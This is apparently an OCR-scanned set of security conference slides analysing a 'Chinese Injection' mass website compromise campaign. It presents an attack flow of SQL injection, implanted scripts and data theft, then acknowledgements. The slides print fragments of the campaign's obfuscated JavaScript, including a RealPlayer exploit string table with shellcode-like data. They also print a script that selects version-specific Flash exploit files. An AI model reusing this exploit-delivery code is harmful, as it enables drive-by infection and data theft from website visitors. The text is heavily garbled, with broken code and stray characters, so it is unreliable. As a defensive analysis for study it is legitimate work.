=27;28(v.2i<T)v+= ,, 2h ,, ;oU=["c:\\\\DE\\\\y\\\\..\\\\..\\\\n\\\\V\\\\2i.s","c:\\\\D 
E\\\\y\\\\2k.s", ,, C:\\\\n\\\\13\\\\2l.s ,, ,"C:\\\\n\\\\2g.2f","c:\\\\D 
E\\\\y\\\\.A\\\.A\\\n\\\\V\\\\2a.sV'C:\\^^ 

t||RealVersion||addr|indexOf|unescape|60|WINDOWS|var|return|for|cvbcbb|wav|x65|user|xcbfcxn|Gamttt_Anhey_Real_Exp_Send|Realpl 
ayerObj|NetMeeting|navigator|x74|63||Program|Files|dddd|Qqs|x6F||79|04|x63|CuteRealVersion2|msie|Gameee_Timeeeeeee_Saveeeee 
eee_Logeeee_ssssssssssssssssss|Ball|CuteRealVersions|toLowerCase||temp|arr1|Media|31|Math|CuteRealVersion|Gamttt||||system32|| 
qwfgsg|userLanguage|75|x4F|06|x58|x62|x6A|error|VERSION|CuteRealVersion3s|chilam|544|PRODUCT|74|same|replace|catch|game|tr 
y|function|4f|userAgent|x4C|x72|x77|70|51 |08|a4|01 109|71 |x43|x61 |a5|new|window|x41 |x69|7f|Caaataaal|EaaaRaaaP|PlayerProperty|x73 
|nt|laaaEaaaR|PaaaCaaataaal|x76|552|PfEqTCuBgEGoDUtR4CfkvB40EDc3UUGbVib4Wo5we6VQVouXdcEN|gOzmMTk8PUoVNENn 
W0J9mlnyWQS3TRGFVt6iEUTgtBwrtTs3r5r5|eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw|2F4StTUZvkFiwxQvtsu 
d7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW|C2|qvRHptd4RPFZVOdoRWQgrWTnPs2T2ERO2OTne3popm4osQu40mPiRNToT7Qypntnp 
esHPeK0Wp|OjZMoJP6eeMlvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL|5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVt 
vTv4uP0DvLYfQ|sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO|32|NuKpTRrNWOVYM5mqqrwSMTnoeoty08J 
MnKJMgPw2pey5MgMWQuMw|runOgp8mpn8m7PrZBEIeoWng2DRELgZMU6REoUJMmLHmz1KUOPCX|e6pfQvXeMpPuVPwP9v0XzF 
~ <m5NiqVxmLzdLSvTuml|HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUIxmmnTL2GWOLNQK|0x8000|while|LoopyM 



/Musi 



c|tada|import|floor|123456456|random|avi|clock|lizhen|length|chimes|TestSnd|BuzzingBee|xkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKV 
e9xJKYoloYolOoCQv|3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB|us|550|en|cn|148|zh|536|543|AntiVirus 
|Fucking|LLLL|XXXXXLD|TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI , .split( , r),0,{})) 



Chinese Injection 



Various SWF Exploits based on version 



<SCRIPT language="JavaScript"> 

window.status="le 3 E"; 

</script> 

<script type="text/javascript" src="swfobject.js"></Script> 

<div id="flashcontent">1 11</div><div id="flashversion">222</div> 

<script type="text/javascript"> 

test = "mymovie"; 

varversionn=deconcept.SWFObjectUtil.getPlayerVersion(); 

if(versionn['major']==9) { 

document.getElementByldCflashversion'J.innerHTML-'"; 

if(versionn['rev']==1 15) { var so=new SWFObject("i115.swf",test; , 0.1","0.1","9","#000000"); so.write("flashcontent") 




else if(versionn['rev']==64) { var so=new SWFObject("i64.swf 
else if(versionn['rev']==47) { var so=new SWFObject("i47.swf 
else if(versionn['rev']==45) { var so=new SWFObject("i45.swf 
else if(versionn['rev']==28) { var so=new SWFObject("i28.swf 



,test,"0.1 
,test,"0.1 
,test,"0.1 
,test,"0.1 



else if(versionn['rev']==16) { var so=new SWFObject("i16.swf",test,"0.1 



","0.1","9","#000000") 
","0.1","9","#000000") 
","0.1","9","#000000") 
","0.1","9","#000000") 
,, ,"0.1","9","#000000") 



so.write("flashcontent") 
so.write("flashcontent") 
so.write("flashcontent") 
so.write("flashcontent") 
so.write("flashcontent") 



else if(versionn['rev']>=124) { if(document.getElementByld) { document.getElementByld('flashversion I ).innerHTML=" 
} 



} 
</Script>v 



Chinese Injection 



Attack Flow 



m Exploits 



SQL injection or '■. 
other Exploit 
against yYe&server. 



""-■ 



Backdoors implanted 

^y^serJpt or iemmz 

code injected 




Attack code 

determines victim 

browser type and 

client versions 



MS Access Exploit 



Steal data from 

User 

Games / 

Financial 





Chinese Injection 



H^ I 



1000's of sites hacked 

Employs various types of evasions and obfuscation 

Updates infrastructure with new exploits mere days after they come out 

Can't be sure its Chinese, but highly likely 

• Based on several clues (languages used, IPs, etc) 



Thanks! 



David Kerb 

Delchi 

Skape 

mCorey 

rjohnson 

Chris Nickerson 





Egypt 

Tebo 

HD Moore 

famousjs 

#AR 

Anyone we forgot 



uestions? 



